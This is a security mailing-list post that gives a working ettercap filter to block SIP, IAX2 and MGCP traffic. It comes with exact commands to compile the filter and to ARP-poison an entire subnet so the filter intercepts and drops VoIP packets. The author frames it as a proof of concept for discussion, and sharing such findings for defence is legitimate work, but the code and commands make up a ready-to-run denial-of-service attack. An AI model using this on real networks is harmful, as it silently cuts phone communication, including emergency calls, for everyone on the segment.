[VOIPSEC] VoIP Blocking Filter w/Ettercap

[Natas]

After playing around with ettercap and its filter program,
etterfilter, I realized how easy it would be to ARP poison a network
and block all VoIP packets from passing through. While packet
manipulation obviously isn't new, and the root of the problem comes
from the ease of ARP poisoning, I was still kind of shocked at how
easy an attack like this could be pulled off in a real world scenario.
A simple ettercap filter can be used to block all SIP, IAX2 and MGCP
traffic, stopping any possible communication across a network segment,
but letting other traffic properly pass through. Below is a basic
filter I wrote up for this list.


# blockvoip.filter
# Proof of concept VoIP blocking filter
# By Natas
# Instructions:
# Run "etterfilter blockvoip.filter -o blockvoip.ef"
# Then "ettercap -T -q -F blockvoip.ef -M ARP /10.1.1.1-254/ //"

if (ip.proto == UDP && udp.src == 4569) {
    msg("Killed Attempted IAX2 Connection.\n");
    drop();
    kill();
}

if (ip.proto == UDP && udp.src == 5060) {
    msg("Killed Attempted SIP Connection.\n");
    drop();
    kill();
}

if (ip.proto == UDP && udp.src == 2427) {
    msg("Killed Attempted MGCP Connection.\n");
    drop();
    kill();
}

# Don't know to much about MGCP Call Agent traffic but
# I put it in here for the hell of it.
if (ip.proto == UDP && udp.src == 2727) {
    msg("Killed Attempted MGCP Call Agent Connection.\n");
    drop();
    kill();
}

# End.

Obviously this is just a simple example and could easily be expanded
to ensure that no VoIP traffic whatsoever passes through.

I'm not sure how everyone here will feel about this little example but
I wanted to put it out there for everyone to see. I have some other
VoIP packet manipulation ideas that I am playing around with.

I enjoy the VoIPSA mailing list very much and like reading every ones
posts and concerns. If you would like to talk off the list, feel free
to email me or contact me at 206-338-3337.

Natas